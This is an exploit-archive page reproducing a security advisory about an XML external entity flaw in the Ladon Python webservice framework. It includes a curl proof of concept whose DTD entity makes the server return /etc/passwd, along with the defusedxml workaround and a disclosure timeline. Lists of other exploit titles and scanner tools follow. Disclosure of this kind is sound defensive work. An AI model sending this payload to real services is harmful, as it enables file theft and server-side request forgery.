"Ladon Framework for Python 0.9.40 - XML External Entity Expansion"

Author

Exploit author

"RedTeam Pentesting"

Platform

Exploit platform

xml

Release date

Exploit published date

2017-11-03

                
                    
                         Download file
                    
                
            
Advisory: XML External Entity Expansion in Ladon Webservice

Attackers who can send SOAP messages to a Ladon webservice via the HTTP
interface of the Ladon webservice can exploit an XML external entity expansion
vulnerability and read local files, forge server side requests or overload the
service with exponentially growing memory payloads.


Details
=======

Product: Ladon Framework for Python
Affected Versions: 0.9.40 and previous
Fixed Versions: none
Vulnerability Type: XML External Entity Expansion
Security Risk: high
Vendor URL: http://ladonize.org
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2016-008
Advisory Status: published
CVE: GENERIC-MAP-NOMATCH
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
============

"Ladon is a framework for exposing methods to several Internet service
protocols. Once a method is ladonized it is automatically served through all
the interfaces that your ladon installation contains. Ladon's interface
implemetations are added in a modular fashion making it very easy [sic] extend
Ladon's protocol support. Ladon runs on all Major OS's[sic] (Windows, Mac and
Linux) and supports both Python 2 and 3."

From the vendor's website[1]


More Details
============

Ladon allows developers to expose functions of a class via different
webservice protocols by using the @ladonize decorator in Python. By
using the WSGI interface of a webserver or by running the Ladon command
line tool "ladon-2.7-ctl" with the command "testserve" and the name of
the Python file, the webservices can be accessed via HTTP.

As a simple example, the following Python file "helloservice.py" was
implemented:

------------------------------------------------------------------------
from ladon.ladonizer import ladonize

class HelloService(object):

    @ladonize(unicode, rtype=unicode)
    def sayhello(self, uid):
        return u"Hello {0}".format(uid)
------------------------------------------------------------------------

This function can then be run as a ladon webservice via the following
command:

------------------------------------------------------------------------
ladon-2.7-ctl testserve helloservice.py -p 8000
------------------------------------------------------------------------

This enables access to the "sayhello"-function via SOAP- and JSON-APIs.

The following command will send an HTTP SOAP request, which will trigger the
function:

------------------------------------------------------------------------
curl -s -X $'POST' \
-H $'Content-Type: text/xml;charset=UTF-8' \
-H $'SOAPAction: \"http://localhost:8888/HelloService/soap11/sayhello\"' \
--data-binary $'<soapenv:Envelope 
xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"
xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"
xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"
xmlns:urn=\"urn:HelloService\"><soapenv:Header/><soapenv:Body>
<urn:sayhello soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">
<uid xsi:type=\"xsd:string\">RedTeam Pentesting</uid>
</urn:sayhello></soapenv:Body></soapenv:Envelope>' \
'http://localhost:8888/HelloService/soap11' | xmllint --format -
------------------------------------------------------------------------

This will generate the following output:

------------------------------------------------------------------------
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
   xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
   xmlns:ns="urn:HelloService" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <SOAP-ENV:Body SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <ns:sayhelloResponse>
      <result>Hello RedTeam Pentesting</result>
    </ns:sayhelloResponse>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
------------------------------------------------------------------------

The SOAP-API of this service is susceptible to an XML external entity
expansion.


Proof of Concept
================

By including a DTD in the XML SOAP request, attackers are able to include
external entities in the response of the server. In the case of the simple
service the inclusion of the following DTD will result in the exposure of the
"/etc/passwd"-file on the server:

------------------------------------------------------------------------
<?xml version="1.0"?>
<!DOCTYPE uid [
    <!ENTITY passwd SYSTEM "file:///etc/passwd">
]>
------------------------------------------------------------------------

The following command exploits this vulnerability by including the &passwd;
entity as the username in the request:

------------------------------------------------------------------------
curl -s -X $'POST' \
-H $'Content-Type: text/xml;charset=UTF-8' \
-H $'SOAPAction: \"http://localhost:8888/HelloService/soap11/sayhello\"' \
--data-binary $'<?xml version="1.0"?>
<!DOCTYPE uid
[<!ENTITY passwd SYSTEM "file:///etc/passwd">
]>
<soapenv:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"
xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\"
xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\"
xmlns:urn=\"urn:HelloService\"><soapenv:Header/>
<soapenv:Body>
<urn:sayhello soapenv:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">
<uid xsi:type=\"xsd:string\">&passwd;</uid>
</urn:sayhello>
</soapenv:Body>
</soapenv:Envelope>' \
'http://localhost:8888/HelloService/soap11' | xmllint --format -
------------------------------------------------------------------------

The server answers with a response containing the passwd-file:

------------------------------------------------------------------------
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/"
 xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
 xmlns:ns="urn:HelloService"
 xmlns:xsd="http://www.w3.org/2001/XMLSchema">
  <SOAP-ENV:Body SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
    <ns:sayhelloResponse>
      <result>Hello root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:[...]</result>
    </ns:sayhelloResponse>
  </SOAP-ENV:Body>
</SOAP-ENV:Envelope>
------------------------------------------------------------------------


Workaround
==========

The Python package defusedxml [2] can be used to monkey patch the code to
prevent XML vulnerabilities.  The following workaround can be included in the
code, which prevents exploitation:

------------------------------------------------------------------------
[...]
import defusedxml
defusedxml.defuse_stdlib()
[...]
------------------------------------------------------------------------


Fix
===

Currently no fix is available.


Security Risk
=============

Attackers are able to read local files on the server of the webservice
with the privileges of the webservice. Furthermore, attackers are able
to create HTTP request from the webservice to other services on the
Internet or the local network. It is likely that attackers are able to
gain access to credentials for database services used by the webservice.
Attackers may also be able to cause a denial-of-service attack against
the respective webservice. Depending on the data stored on the
vulnerable system and the relevance of the webservice, this
vulnerability may pose a high risk.


Timeline
========

2016-11-29 Vulnerability identified
2016-11-29 Customer notified vendor
2017-07-10 Customer fixed problem in their own product
2017-07-21 RedTeam Pentesting notified vendor
2017-08-11 RedTeam Pentesting asked vendor for status update
2017-09-08 RedTeam Pentesting asked vendor for status update and announced
           public release for end of October
2017-10-09 RedTeam Pentesting asked vendor for status update
2017-11-03 Advisory released (no reply from vendor to status update requests)


References
==========

[1] http://ladonize.org
[2] https://pypi.python.org/pypi/defusedxml


RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests performed by a
team of specialised IT-security experts. Hereby, security weaknesses in
company networks or products are uncovered and can be fixed immediately.

As there are only few experts in this field, RedTeam Pentesting wants to
share its knowledge and enhance the public knowledge with research in
security-related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at:
https://www.redteam-pentesting.de/


Working at RedTeam Pentesting
=============================

RedTeam Pentesting GmbH is looking for more penetration testers to join
our team. If you are interested in working for RedTeam Pentesting in
Aachen, please visit the respective section of our website.

-- 
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Dennewartstr. 25-27                       Fax : +49 241 510081-99
52068 Aachen                    https://www.redteam-pentesting.de
Germany                         Registergericht: Aachen HRB 14004
Geschaftsfuhrer:                       Patrick Hof, Jens Liebchen

Release Date	Title	Type	Platform	Author
2020-12-02	"aSc TimeTables 2021.6.2 - Denial of Service (PoC)"	local	windows	"Ismael Nava"
2020-12-02	"Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality"	webapps	php	"Mufaddal Masalawala"
2020-12-02	"Ksix Zigbee Devices - Playback Protection Bypass (PoC)"	remote	multiple	"Alejandro Vazquez Vazquez"
2020-12-02	"Mitel mitel-cs018 - Call Data Information Disclosure"	remote	linux	"Andrea Intilangelo"
2020-12-02	"Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile"	webapps	multiple	"Shahrukh Iqbal Mirza"
2020-12-02	"ChurchCRM 4.2.0 - CSV/Formula Injection"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"DotCMS 20.11 - Stored Cross-Site Scripting"	webapps	multiple	"Hardik Solanki"
2020-12-02	"ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)"	webapps	multiple	"Mufaddal Masalawala"
2020-12-02	"NewsLister - Authenticated Persistent Cross-Site Scripting"	webapps	multiple	"Emre Aslan"
2020-12-02	"IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path"	local	windows	"Manuel Alvarez"

Release Date	Title	Type	Platform	Author
2020-07-07	"Microsoft Windows mshta.exe 2019 - XML External Entity Injection"	remote	xml	hyp3rlinx
2020-05-05	"BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection"	webapps	xml	"Daniel Martinez Adan"
2020-02-07	"ExpertGPS 6.38 - XML External Entity Injection"	webapps	xml	"Trent Gordon"
2020-01-22	"Citrix XenMobile Server 10.8 - XML External Entity Injection"	webapps	xml	"Jonas Lejon"
2020-01-20	"Easy XML Editor 1.7.8 - XML External Entity Injection"	local	xml	"Javier Olmedo"
2020-01-09	"MSN Password Recovery 1.30 - XML External Entity Injection"	local	xml	ZwX
2019-12-04	"Microsoft Visual Basic 2010 Express - XML External Entity Injection"	local	xml	ZwX
2019-12-03	"Microsoft Windows Media Center 2002 - XML External Entity MotW Bypass"	local	xml	hyp3rlinx
2019-12-02	"Microsoft Excel 2016 1901 - XML External Entity Injection"	local	xml	hyp3rlinx
2019-12-02	"Visual Studio 2008 - XML External Entity Injection"	local	xml	hyp3rlinx

Release Date	Title	Type	Platform	Author
2019-01-25	"Cisco RV320 Dual Gigabit WAN VPN Router 1.4.2.15 - Command Injection"	webapps	hardware	"RedTeam Pentesting"
2018-04-09	"CyberArk Password Vault < 9.7 / < 10 - Memory Disclosure"	dos	linux	"RedTeam Pentesting"
2018-04-09	"CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution"	webapps	json	"RedTeam Pentesting"
2017-11-03	"Ladon Framework for Python 0.9.40 - XML External Entity Expansion"	webapps	xml	"RedTeam Pentesting"
2017-07-24	"REDDOXX Appliance Build 2032 / 2.0.625 - Remote Command Execution"	webapps	json	"RedTeam Pentesting"
2017-07-24	"REDDOXX Appliance Build 2032 / 2.0.625 - Arbitrary File Disclosure"	webapps	json	"RedTeam Pentesting"
2016-01-07	"AVM FRITZ!Box < 6.30 - Remote Buffer Overflow"	remote	hardware	"RedTeam Pentesting"
2015-06-16	"TYPO3 Extension Akronymmanager 0.5.0 - SQL Injection"	webapps	php	"RedTeam Pentesting"
2015-06-10	"Alcatel-Lucent OmniSwitch - Cross-Site Request Forgery"	webapps	hardware	"RedTeam Pentesting"
2015-02-11	"IBM Endpoint Manager - Persistent Cross-Site Scripting"	webapps	cgi	"RedTeam Pentesting"
2014-12-02	"EntryPass N5200 - Credentials Exposure"	webapps	hardware	"RedTeam Pentesting"
2014-12-02	"TYPO3 Extension ke DomPDF - Remote Code Execution"	webapps	php	"RedTeam Pentesting"
2014-06-27	"Python CGIHTTPServer - Encoded Directory Traversal"	webapps	multiple	"RedTeam Pentesting"
2014-06-27	"Endeca Latitude 2.2.2 - Cross-Site Request Forgery"	webapps	multiple	"RedTeam Pentesting"
2014-06-09	"DevExpress ASPxFileManager 10.2 < 13.2.8 - Directory Traversal"	webapps	asp	"RedTeam Pentesting"
2012-05-02	"PHP-decoda - 'Video Tag' Cross-Site Scripting"	webapps	php	"RedTeam Pentesting"
2011-05-04	"ZyWALL USG Appliance - Multiple Vulnerabilities"	remote	hardware	"RedTeam Pentesting"
2009-12-21	"TLS - Renegotiation"	remote	multiple	"RedTeam Pentesting"
2009-08-10	"Papoo CMS 3.7.3 - (Authenticated) Arbitrary Code Execution"	webapps	php	"RedTeam Pentesting"
2009-05-05	"IceWarp Merak Mail Server 9.4.1 Groupware Component - Multiple SQL Injections"	webapps	php	"RedTeam Pentesting"
2008-03-11	"Mapbender 2.4.4 - 'mapFiler.php' Remote Code Execution"	webapps	php	"RedTeam Pentesting"
2008-03-11	"Mapbender 2.4.4 - 'gaz' SQL Injection"	webapps	php	"RedTeam Pentesting"
2007-07-13	"ActiveWeb Contentserver CMS 5.6.2929 - Client-Side Filtering Bypass"	webapps	php	"RedTeam Pentesting"
2007-07-13	"ActiveWeb Contentserver 5.6.2929 - 'Picture_Real_Edit.asp' SQL Injection"	webapps	asp	"RedTeam Pentesting"
2007-07-13	"contentserver 5.6.2929 - '/errors/transaction.asp?msg' Cross-Site Scripting"	webapps	asp	"RedTeam Pentesting"
2007-07-13	"contentserver 5.6.2929 - '/errors/rights.asp?msg' Cross-Site Scripting"	webapps	asp	"RedTeam Pentesting"
2006-05-22	"Prodder 0.4 - Arbitrary Shell Command Execution"	remote	linux	"RedTeam Pentesting"
2005-02-15	"CitrusDB 0.3.6 - 'uploadcc.php' Arbitrary Database Injection"	webapps	php	"RedTeam Pentesting"
2005-02-15	"CitrusDB 0.3.6 - Arbitrary Local PHP File Inclusion"	webapps	php	"RedTeam Pentesting"
2005-02-15	"CitrusDB 0.3.6 - 'importcc.php' CSV File SQL Injection"	webapps	php	"RedTeam Pentesting"

import requests

response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher	Protocols	Sigalg	Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host	WAF detected

Whatweb

Dns lookup

Raccoon scanner

Cmseek

WAF detector

DNS reconnaince

Bing IP2Host

Wappalyzer

Waybackurl

HostHunter

WPScan

Apache Users

CORS Scanner

API Docs

ReDoc

OpenAPI

Swagger

Search for hundreds of thousands of exploits

"Ladon Framework for Python 0.9.40 - XML External Entity Expansion"

Download file

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.